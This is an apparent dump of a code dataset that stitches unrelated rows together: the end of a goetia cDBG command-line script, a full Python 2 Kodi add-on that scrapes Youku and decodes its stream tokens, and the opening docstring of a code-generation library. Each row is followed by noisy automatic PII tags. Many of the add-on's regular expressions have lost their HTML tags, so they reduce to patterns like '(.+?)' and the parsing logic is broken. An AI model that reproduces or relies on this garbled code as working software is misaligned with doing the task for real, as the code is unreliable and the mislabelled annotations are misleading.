args.results_dir, file=sys.stderr) + if args.save_cdbg: + print('* Saving cDBG every {0} sequences with file prefix {1}'.format(args.coarse_interval, + args.save_cdbg), + file=sys.stderr) + print('* cDBG save formats: {0}'.format(', '.join(args.save_cdbg_format))) + if args.track_cdbg_stats: + print('* Tracking cDBG stats and reporting every {0} sequences'.format(args.fine_interval), + file=sys.stderr) + print('* Saving tracking information to', args.track_cdbg_stats, file=sys.stderr) + if args.track_cdbg_history: + print('* Tracking cDBG history and saving to', args.track_cdbg_history, file=sys.stderr) + if args.validate: + print('* cDBG will be validated on completion and results saved to', args.validate, + file=sys.stderr) + print('*', '*' * 10, '*', sep='\n', file=sys.stderr) + + +",11564,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '11.03.2020'], ['PERSON', 'Camille Scott'], ['DATE_TIME', '2019'], ['PERSON', 'Camille Scott'], ['LOCATION', 'goetia.messages'], ['PERSON', 'get_fastx_args(parser'], ['PERSON', 'exist_ok=True'], ['LOCATION', 'sample_iter'], ['PERSON', 'self.to_close'], ['PERSON', 'with_monitor=args.curio_monitor'], ['PERSON', ""const='goetia.cdbg.stats.json""], ['PERSON', ""help='Output""], ['PERSON', ""help='Output""], ['PERSON', ""help='Bin""], ['PERSON', ""const='goetia.cdbg.validation.csv""], ['LOCATION', 'join(args.track_unitig_bp'], ['URL', 'stream.py'], ['URL', 'email.com'], ['URL', 'goetia.cd'], ['URL', 'goetia.pa'], ['URL', 'goetia.pro'], ['URL', 'goetia.me'], ['URL', 'goetia.me'], ['URL', 'goetia.se'], ['URL', 'goetia.cli.ar'], ['URL', 'goetia.cli.ru'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'os.ma'], ['URL', 'args.re'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'args.st'], ['URL', 'args.st'], ['URL', 'args.gr'], ['URL', 'self.st'], ['URL', 'self.cd'], ['URL', 'libgoetia.cdbg.cD'], ['URL', 'self.com'], ['URL', 'libgoetia.cdbg.St'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 't.Com'], ['URL', 'args.no'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.No'], ['URL', 'self.com'], ['URL', 'args.no'], ['URL', 'args.int'], ['URL', 'self.fi'], ['URL', 'self.com'], ['URL', 't.Pro'], ['URL', 'self.com'], ['URL', 'args.int'], ['URL', 'args.in'], ['URL', 'args.pa'], ['URL', 'args.na'], ['URL', 'self.pro'], ['URL', 'self.fi'], ['URL', 'args.ec'], ['URL', 'self.processor.ad'], ['URL', 'cdbg.co'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'self.com'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.cd'], ['URL', 'self.cd'], ['URL', 'self.compactor.cd'], ['URL', 'args.tr'], ['URL', 'args.com'], ['URL', 'args.ve'], ['URL', 'self.to'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.cd'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'args.sa'], ['URL', 'args.ve'], ['URL', 'curio.ao'], ['URL', 'self.to'], ['URL', 'msg.ms'], ['URL', 'msg.sa'], ['URL', 'msg.se'], ['URL', 'msg.ms'], ['URL', 'msg.er'], ['URL', 'sys.st'], ['URL', 'curio.ru'], ['URL', 'self.processor.st'], ['URL', 'args.cu'], ['URL', 'parser.de'], ['URL', 'parser.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.gr'], ['URL', 'group.ad'], ['URL', 'cDBGSerialization.FO'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.st'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.com'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cd'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'group.ad'], ['URL', 'goetia.cdbg.va'], ['URL', 'os.path.jo'], ['URL', 'args.re'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'args.sa'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.re'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.co'], ['URL', 'args.sa'], ['URL', 'sys.st'], ['URL', 'args.sa'], ['URL', 'args.tr'], ['URL', 'args.fi'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.tr'], ['URL', 'args.tr'], ['URL', 'sys.st'], ['URL', 'args.va'], ['URL', 'args.va'], ['URL', 'sys.st'], ['URL', 'sys.st']]" +39,"# -*- coding: utf-8 -*- +import xbmc, xbmcgui, xbmcplugin, xbmcaddon, urllib2, urllib, re, string, sys, os, gzip, StringIO, math, urlparse +import base64, time, cookielib +import simplejson + +# Plugin constants +__addon__ = xbmcaddon.Addon() +__addonname__ = __addon__.getAddonInfo('name') +__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode(""utf-8"") + +UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' +ORDER_LIST1 = [['1','最多播放'], ['2','最多评论'], ['4','最受欢迎'], ['5','最近上映'], ['6','最近更新']] +DAYS_LIST1 = [['1','今日'], ['2','本周'], ['4','历史']] +ORDER_LIST2 = [['1','最多播放'], ['2','最新发布'], ['3','最多评论'], ['4','最多收藏'], ['5','最受欢迎']] +DAYS_LIST2 = [['1','今日'], ['2','本周'], ['3','本月'], ['4','历史']] + +class youkuDecoder: + def __init__( self ): + return + + def getFileIDMixString(self,seed): + mixed = [] + source = list(""abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/\:._-1234567890"") + seed = float(seed) + for i in range(len(source)): + seed = (seed * 211 + 30031 ) % 65536 + index = math.floor(seed /65536 *len(source)) + mixed.append(source[int(index)]) + source.remove(source[int(index)]) + return mixed + + def getFileId(self,fileId,seed): + mixed = self.getFileIDMixString(seed) + ids = fileId.split('*') + realId = [] + for i in range(0,len(ids)-1): + realId.append(mixed[int(ids[i])]) + return ''.join(realId) + + def trans_e(self, a, c): + b = range(256) + f = 0 + result = '' + h = 0 + while h < 256: + f = (f + b[h] + ord(a[h % len(a)])) % 256 + b[h], b[f] = b[f], b[h] + h += 1 + q = f = h = 0 + while q < len(c): + h = (h + 1) % 256 + f = (f + b[h]) % 256 + b[h], b[f] = b[f], b[h] + result += chr(ord(c[q]) ^ b[(b[h] + b[f]) % 256]) + q += 1 + return result + + def trans_f(self, a, c): + """""" + :argument a: list + :param c: + :return: + """""" + b = [] + for f in range(len(a)): + i = ord(a[f][0]) - 97 if ""a"" <= a[f] <= ""z"" else int(a[f]) + 26 + e = 0 + while e < 36: + if c[e] == i: + i = e + break + e += 1 + v = i - 26 if i > 25 else chr(i + 97) + b.append(str(v)) + return ''.join(b) + + f_code_1 = 'becaf9be' + f_code_2 = 'bf7e5f01' + + def _calc_ep(self, sid, fileId, token): + ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, fileId, token)) + return base64.b64encode(ep) + + def _calc_ep2(self, vid, ep): + e_code = self.trans_e(self.f_code_1, base64.b64decode(ep)) + sid, token = e_code.split('_') + new_ep = self.trans_e(self.f_code_2, '%s_%s_%s' % (sid, vid, token)) + return base64.b64encode(new_ep), token, sid + + def get_sid(self, ep): + e_code = self.trans_e(self.f_code_1, base64.b64decode(ep)) + return e_code.split('_') + + def generate_ep(self, no, fileid, sid, token): + ep = urllib.quote(self._calc_ep(sid, fileid, token).encode('latin1'), + safe=""~()*!.'"" + ) + return ep + +def log(txt): + message = '%s: %s' % (__addonname__, txt) + xbmc.log(msg=message, level=xbmc.LOGDEBUG) + +def GetHttpData(url, referer=''): + log(""%s::url - %s"" % (sys._getframe().f_code.co_name, url)) + req = urllib2.Request(url) + req.add_header('User-Agent', UserAgent) + if referer: + req.add_header('Referer', referer) + try: + response = urllib2.urlopen(req) + httpdata = response.read() + if response.headers.get('content-encoding', None) == 'gzip': + httpdata = gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read() + charset = response.headers.getparam('charset') + response.close() + except: + log( ""%s (%d) [%s]"" % ( + sys.exc_info()[2].tb_frame.f_code.co_name, + sys.exc_info()[2].tb_lineno, + sys.exc_info()[1] + )) + return '' + match = re.compile('(.+?)').search(text) + if match: + list.append([id, match.group(1)]) + +def getList(listpage,id,genre,area,year): + if id == 'c_95': + str1 = '风格:' + str3a = '发行:' + str3b = 'r' + elif id == 'c_84' or id == 'c_87': + str1 = '类型:' + str3a = '出品:' + str3b = 'pr' + else: + str1 = '类型:' + str3a = '时间:' + str3b = 'r' + match = re.compile('(.+?)' % (str1), re.DOTALL).search(listpage) + genrelist = re.compile('_g_([^_\.]*)[^>]*>([^<]+)').findall(match.group(1)) + getCurrent(match.group(1), genrelist, genre) + if id == 'c_84' or id == 'c_87': + arealist = [] + else: + match = re.compile('(.+?)', re.DOTALL).search(listpage) + arealist = re.compile('_a_([^_\.]*)[^>]*>([^<]+)').findall(match.group(1)) + getCurrent(match.group(1), arealist, area) + match = re.compile('(.+?)' % (str3a), re.DOTALL).search(listpage) + yearlist = re.compile('_%s_([^_\.]*)[^>]*>([^<]+)' % (str3b)).findall(match.group(1)) + getCurrent(match.group(1), yearlist, year) + return genrelist,arealist,yearlist + +def getList2(listpage,genre): + match = re.compile('(.+?)', re.DOTALL).search(listpage) + if match: + genrelist = re.compile('
  • ]*>(.+?)
  • ').findall(match.group(1)) + getCurrent(match.group(1), genrelist, genre) + else: + genrelist = [] + return genrelist + +def rootList(): + link = GetHttpData('http://list.youku.com/') + match0 = re.compile('(.+?)', re.DOTALL).search(link) + match = re.compile('
  • (.+?)
  • ', re.DOTALL).findall(match0.group(1)) + totalItems = len(match) + for path, id, name in match: + if path == 'show': + u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=&area=&year=&order=1&days=1&page=1"" + else: + u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=0&year=1&order=1&days=1&page=1"" + li = xbmcgui.ListItem(name) + xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems) + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def progList(name,id,page,genre,area,year,order,days): + url = 'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html' % (id, genre, area, order, days, year, page) + link = GetHttpData(url) + match = re.compile('
      (.+?)
    ', re.DOTALL).search(link) + plist = [] + if match: + match1 = re.compile('([0-9]+)(|)', re.DOTALL).findall(match.group(1)) + if match1: + for num, temp in match1: + if (num not in plist) and (num != page): + plist.append(num) + totalpages = int(match1[len(match1)-1][0]) + else: + totalpages = 1 + match = re.compile('
    (.+?)
    ', re.DOTALL).search(link) + if match: + listpage = match.group(1) + else: + listpage = '' + if id == 'c_95': + match = re.compile('
    ', re.DOTALL).findall(link) + else: + match = re.compile('
    (.+?)
    ', re.DOTALL).findall(link) + totalItems = len(match) + 1 + len(plist) + currpage = int(page) + + genrelist,arealist,yearlist = getList(listpage,id,genre,area,year) + if genre: + genrestr = searchDict(genrelist,genre) + else: + genrestr = '全部类型' + if area: + areastr = searchDict(arealist,area) + else: + areastr = '全部地区' + if year: + yearstr = searchDict(yearlist,year) + else: + if id == 'c_84' or id == 'c_87': + yearstr = '全部出品' + else: + yearstr = '全部年份' + li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + areastr + '[/COLOR]/[COLOR FFFFFF00]' + yearstr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST1,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST1,order) + '[/COLOR]】(按此选择)') + u = sys.argv[0]+""?mode=4&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+urllib.quote_plus(year)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + for i in range(0,len(match)): + if id in ('c_96','c_95'): + mode = 2 + isdir = False + else: + mode = 3 + isdir = True + match1 = re.compile('/id_(.+?).html""').search(match[i]) + p_id = match1.group(1) + match1 = re.compile('(.+?)').search(match[i]) + p_name = match1.group(1) + match1 = re.compile('
  • (.+?)').search(match[i]) + if match1: + p_name1 = p_name + '(' + match1.group(1) + ')' + else: + p_name1 = p_name + match1 = re.compile('(.+?)').search(match[i]) + if match1: + p_name1 = p_name1 + '[' + match1.group(1) + ']' + li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb) + u = sys.argv[0]+""?mode=""+str(mode)+""&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb) + #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline}) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems) + + for num in plist: + li = xbmcgui.ListItem(""... 第"" + num + ""页"") + u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+year+""&order=""+order+""&days=""+days+""&page=""+str(num) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + xbmcplugin.setContent(int(sys.argv[1]), 'movies') + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def getMovie(name,id,thumb): + if len(id)==21: + link = GetHttpData('http://www.youku.com/show_page/id_' + id + '.html') + match = re.compile('.*?href=""http://v.youku.com/v_show/id_(.+?)\.html[^""]*""', re.DOTALL).search(link) + if match: + # 播放正片 + PlayVideo(name, match.group(1), thumb) + else: + # 解析预告片 + match = re.compile('class=""btnShow btnplaytrailer"".*?href=""http://v.youku.com/v_show/id_(.+?)\.html[^""]*""', re.DOTALL).search(link) + if match: + PlayVideo(name, match.group(1), thumb) + else: + xbmcgui.Dialog().ok(__addonname__, '解析地址异常,可能是收费节目,无法播放') + else: + PlayVideo(name, id, thumb) + +def seriesList(name,id,thumb): + url = ""http://v.youku.com/v_show/id_%s.html"" % (id) + data = GetHttpData(url) + #pages = re.compile('
  • 1: + # for i in range(1,len(pages)): + # url = ""http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"" % (id, pages[i], pages[i]) + # link = GetHttpData(url) + # data += link + match = re.compile('class=""item(.+?)
  • ', re.DOTALL).findall(data) + totalItems = len(match) + + for i in range(0,len(match)): + match1 = re.compile('//v.youku.com/v_show/id_(.+?)\.html').search(match[i]) + if match1: + p_id = match1.group(1) + else: + continue + #match1 = re.compile('
    (.+?)', re.DOTALL).search(link) + plist = [] + if match: + match1 = re.compile('([0-9]+)(|)', re.DOTALL).findall(match.group(1)) + if match1: + for num, temp in match1: + if (num not in plist) and (num != page): + plist.append(num) + totalpages = int(match1[len(match1)-1][0]) + else: + totalpages = 1 + match = re.compile('
    (.+?)
    ', re.DOTALL).search(link) + if match: + listpage = match.group(1) + else: + listpage = '' + match = re.compile('
    ', re.DOTALL).findall(link) + + totalItems = len(match) + 1 + len(plist) + currpage = int(page) + + genrelist = getList2(listpage, genre) + if genre == '0': + genrestr = '全部类型' + else: + genrestr = searchDict(genrelist,genre) + li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)') + u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + for i in range(0,len(match)): + match1 = re.compile('/id_(.+?).html""').search(match[i]) + p_id = match1.group(1) + match1 = re.compile('(.+?)').search(match[i]) + p_name = match1.group(1) + p_name1 = p_name + li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb) + u = sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb) + #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline}) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems) + + for num in plist: + li = xbmcgui.ListItem(""... 第"" + num + ""页"") + u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + xbmcplugin.setContent(int(sys.argv[1]), 'movies') + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def selResolution(streamtypes): + ratelist = [] + for i in range(0,len(streamtypes)): + if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [清晰度设置值, 清晰度, streamtypes索引] + if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4']) + if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2']) + if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3']) + ratelist.sort() + if len(ratelist) > 1: + resolution = int(__addon__.getSetting('resolution')) + if resolution == 0: # 每次询问视频清晰度 + list = [x[1] for x in ratelist] + sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', list) + if sel == -1: + return None, None, None, None + else: + sel = 0 + while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1 + else: + sel = 0 + return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3] + +def youku_ups(id): + res = urllib2.urlopen('https://log.mmstat.com/eg.js') + cna = res.headers['etag'][1:-1] + query = urllib.urlencode(dict( + vid = id, + ccode = '0516', + client_ip = '127.0.0.1', + utid = cna, + client_ts = time.time() / 1000, + ckey = 'PI:KEY' + )) + url = 'https://ups.youku.com/ups/get.json?%s' % (query) + link = GetHttpData(url, referer='http://v.youku.com/') + json_response = simplejson.loads(link) + api_data = json_response['data'] + data_error = api_data.get('error') + if data_error: + api_error_code = data_error.get('code') + api_error_msg = data_error.get('note').encode('utf-8') + dialog = xbmcgui.Dialog() + ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg)) + return {} + else: + return api_data + +def change_cdn(url): + # if the cnd_url starts with an ip addr, it should be youku's old CDN + # which rejects http requests randomly with status code > 400 + # change it to the dispatcher of aliCDN can do better + # at least a little more recoverable from HTTP 403 + dispatcher_url = 'vali.cp31.ott.cibntv.net' + if dispatcher_url in url: + return url + elif 'k.youku.com' in url: + return url + else: + url_seg_list = list(urlparse.urlsplit(url)) + url_seg_list[1] = dispatcher_url + return urlparse.urlunsplit(url_seg_list) + +def PlayVideo(name,id,thumb): + movdat = youku_ups(id) + if not movdat: + return + + vid = id + lang_select = int(__addon__.getSetting('lang_select')) # 默认|每次选择|自动首选 + if lang_select != 0 and movdat.has_key('dvd') and 'audiolang' in movdat['dvd']: + langlist = movdat['dvd']['audiolang'] + if lang_select == 1: + list = [x['lang'] for x in langlist] + sel = xbmcgui.Dialog().select('选择语言', list) + if sel ==-1: + return + vid = langlist[sel]['vid'].encode('utf-8') + name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8')) + else: + lang_prefer = __addon__.getSetting('lang_prefer') # 国语|粤语 + for i in range(0,len(langlist)): + if langlist[i]['lang'].encode('utf-8') == lang_prefer: + vid = langlist[i]['vid'].encode('utf-8') + name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8')) + break + if vid != id: + movdat = youku_ups(vid) + if not movdat: + return + + streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']] + typeid, typename, streamno, resolution = selResolution(streamtypes) + if typeid: + ''' + oip = movdat['security']['ip'] + ep = movdat['security']['encrypt_string'] + sid, token = youkuDecoder().get_sid(ep) + play_method = int(__addon__.getSetting('play_method')) + if play_method != 0: # m3u8方式 + query = urllib.urlencode(dict( + vid=vid, ts=int(time.time()), keyframe=1, type=resolution, + ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid, + )) + cookie = ['%s=%s' % (x.name, x.value) for x in cj][0] + movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie) + + else: # 默认播放方式 + if typeid in ('mp4', 'mp4hd'): + type = 'mp4' + else: + type = 'flv' + urls = [] + segs = movdat['stream'][streamno]['segs'] + total = len(segs) + for no in range(0, total): + k = segs[no]['key'] + if k == -1: + dialog = xbmcgui.Dialog() + ok = dialog.ok(__addonname__,'会员节目,无法播放') + return + fileid = segs[no]['fileid'] + ep = youkuDecoder().generate_ep(no, fileid, sid, token) + query = urllib.urlencode(dict( + ctype = 12, + ev = 1, + K = k, + ep = urllib.unquote(ep), + oip = oip, + token = token, + yxon = 1 + )) + url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format( + sid = sid, + container = type, + fileid = fileid, + query = query + ) + link = GetHttpData(url) + json_response = simplejson.loads(link) + urls.append(json_response[0]['server'].encode('utf-8')) + movurl = 'stack://' + ' , '.join(urls) + ''' + movurl = movdat['stream'][streamno]['m3u8_url'] + #urls = [] + #is_preview = False + #for seg in movdat['stream'][streamno]['segs']: + # if seg.get('cdn_url'): + # urls.append(change_cdn(seg['cdn_url'].encode('utf-8'))) + # else: + # is_preview = True + #if not is_preview: + # movurl = 'stack://' + ' , '.join(urls) + name = '%s[%s]' % (name, typename) + listitem=xbmcgui.ListItem(name,thumbnailImage=thumb) + listitem.setInfo(type=""Video"",infoLabels={""Title"":name}) + xbmc.Player().play(movurl, listitem) + +def performChanges(name,id,listpage,genre,area,year,order,days): + genrelist,arealist,yearlist = getList(listpage,id,genre,area,year) + change = False + if id == 'c_95': + str1 = '风格' + str3 = '发行' + elif id == 'c_84' or id == 'c_87': + str1 = '类型' + str3 = '出品' + else: + str1 = '类型' + str3 = '时间' + dialog = xbmcgui.Dialog() + if len(genrelist)>0: + list = [x[1] for x in genrelist] + sel = dialog.select(str1, list) + if sel != -1: + genre = genrelist[sel][0] + change = True + if len(arealist)>0: + list = [x[1] for x in arealist] + sel = dialog.select('地区', list) + if sel != -1: + area = arealist[sel][0] + change = True + if len(yearlist)>0: + list = [x[1] for x in yearlist] + sel = dialog.select(str3, list) + if sel != -1: + year = yearlist[sel][0] + change = True + list = [x[1] for x in DAYS_LIST1] + sel = dialog.select('范围', list) + if sel != -1: + days = DAYS_LIST1[sel][0] + change = True + list = [x[1] for x in ORDER_LIST1] + sel = dialog.select('排序', list) + if sel != -1: + order = ORDER_LIST1[sel][0] + change = True + + if change: + progList(name,id,'1',genre,area,year,order,days) + +def performChanges2(name,id,listpage,genre,order,days): + genrelist = getList2(listpage, genre) + change = False + dialog = xbmcgui.Dialog() + if len(genrelist)>0: + list = [x[1] for x in genrelist] + sel = dialog.select('类型', list) + if sel != -1: + genre = genrelist[sel][0] + change = True + list = [x[1] for x in DAYS_LIST2] + sel = dialog.select('范围', list) + if sel != -1: + days = DAYS_LIST2[sel][0] + change = True + list = [x[1] for x in ORDER_LIST2] + sel = dialog.select('排序', list) + if sel != -1: + order = ORDER_LIST2[sel][0] + change = True + + if change: + progList2(name,id,'1',genre,order,days) + +def get_params(): + param = [] + paramstring = sys.argv[2] + if len(paramstring) >= 2: + params = sys.argv[2] + cleanedparams = params.replace('?', '') + if (params[len(params) - 1] == '/'): + params = params[0:len(params) - 2] + pairsofparams = cleanedparams.split('&') + param = {} + for i in range(len(pairsofparams)): + splitparams = {} + splitparams = pairsofparams[i].split('=') + if (len(splitparams)) == 2: + param[splitparams[0]] = splitparams[1] + return param + +params = get_params() +mode = None +name = '' +id = '' +genre = '' +area = '' +year = '' +order = '' +page = '1' +url = None +thumb = None + +try: + thumb = urllib.unquote_plus(params[""thumb""]) +except: + pass +try: + url = urllib.unquote_plus(params[""url""]) +except: + pass +try: + page = urllib.unquote_plus(params[""page""]) +except: + pass +try: + order = urllib.unquote_plus(params[""order""]) +except: + pass +try: + days = urllib.unquote_plus(params[""days""]) +except: + pass +try: + year = urllib.unquote_plus(params[""year""]) +except: + pass +try: + area = urllib.unquote_plus(params[""area""]) +except: + pass +try: + genre = urllib.unquote_plus(params[""genre""]) +except: + pass +try: + id = urllib.unquote_plus(params[""id""]) +except: + pass +try: + name = urllib.unquote_plus(params[""name""]) +except: + pass +try: + mode = int(params[""mode""]) +except: + pass + +cj = cookielib.CookieJar() +opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) +urllib2.install_opener(opener) + +if mode == None: + rootList() +elif mode == 1: + progList(name,id,page,genre,area,year,order,days) +elif mode == 2: + getMovie(name,id,thumb) +elif mode == 3: + seriesList(name,id,thumb) +elif mode == 4: + performChanges(name,id,page,genre,area,year,order,days) +elif mode == 10: + PlayVideo(name,id,thumb) +elif mode == 11: + progList2(name,id,page,genre,order,days) +elif mode == 12: + performChanges2(name,id,page,genre,order,days) + +",27353,"[['URL', ""http://list.youku.com/'""], ['URL', ""http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'""], ['URL', ""http://www.youku.com/show_page/id_'""], ['URL', 'http://v.youku.com/v_show/id_%s.html""'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s""'], ['URL', ""http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://ups.youku.com/ups/get.json?%s'""], ['URL', ""http://v.youku.com/'""], ['URL', ""http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'""], ['URL', ""http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format""], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', ""'5','最受欢迎'""], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', ""yearstr + '""], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'
  • . + +"""""" +.. moduleauthor:: Douglas RAILLARD dummy@email.com + +This module mostly provides base classes intended to be subclassed for building +langage specific source code generation libraries. + +They implement functionnalities related to operators overloading that can be used in any langage. +Every class representing source code constructs are known as node. +The following helpers functions are provided: + +* :func:`listify`: create a list from an iterable or a single element. +* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.). +* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string. + +The following classes are provided: + +* :class:`Indentation`: manage the indentation level in the code generator. +* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`. +* :class:`NodeMeta`: metaclass of all class representing some source code constructs. +* :class:`NodeABC`: abstract base class of all class representing some source code constructs. +* :class:`NodeBase`: base class of almost all class representing some source code constructs. +* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition. +* 